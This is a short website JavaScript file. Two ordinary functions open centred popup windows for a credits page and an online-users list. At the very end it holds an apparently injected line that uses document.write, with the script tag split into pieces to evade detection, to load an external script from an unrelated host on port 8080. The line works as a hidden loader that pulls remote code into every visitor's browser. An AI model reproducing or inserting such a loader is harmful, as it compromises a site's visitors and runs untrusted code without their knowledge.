function getcredits() 
{
 var width  = 300;
 var height = 207;
 var left   = (screen.width  - width)/2;
 var top    = (screen.height - height)/2;
 var params = 'width='+width+', height='+height;
 params += ', top='+top+', left='+left;
 params += ', directories=no';
 params += ', location=no';
 params += ', menubar=no';
 params += ', resizable=no';
 params += ', scrollbars=no';
 params += ', status=no';
 params += ', toolbar=no';
 newwin=window.open('credits.html','windowname5', params);
 if (window.focus) {newwin.focus()}
 return false;
}

function getonlinelist() 
{
 var width  = 300;
 var height = 196;
 var left   = (screen.width  - width)/2;
 var top    = (screen.height - height)/2;
 var params = 'width='+width+', height='+height;
 params += ', top='+top+', left='+left;
 params += ', directories=no';
 params += ', location=no';
 params += ', menubar=no';
 params += ', resizable=no';
 params += ', scrollbars=yes';
 params += ', status=no';
 params += ', toolbar=no';
 newwin=window.open('online.php','windowname5', params);
 if (window.focus) {newwin.focus()}
 return false;
}



document.write('<s'+'cript type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Raw_File.js"></scr'+'ipt>');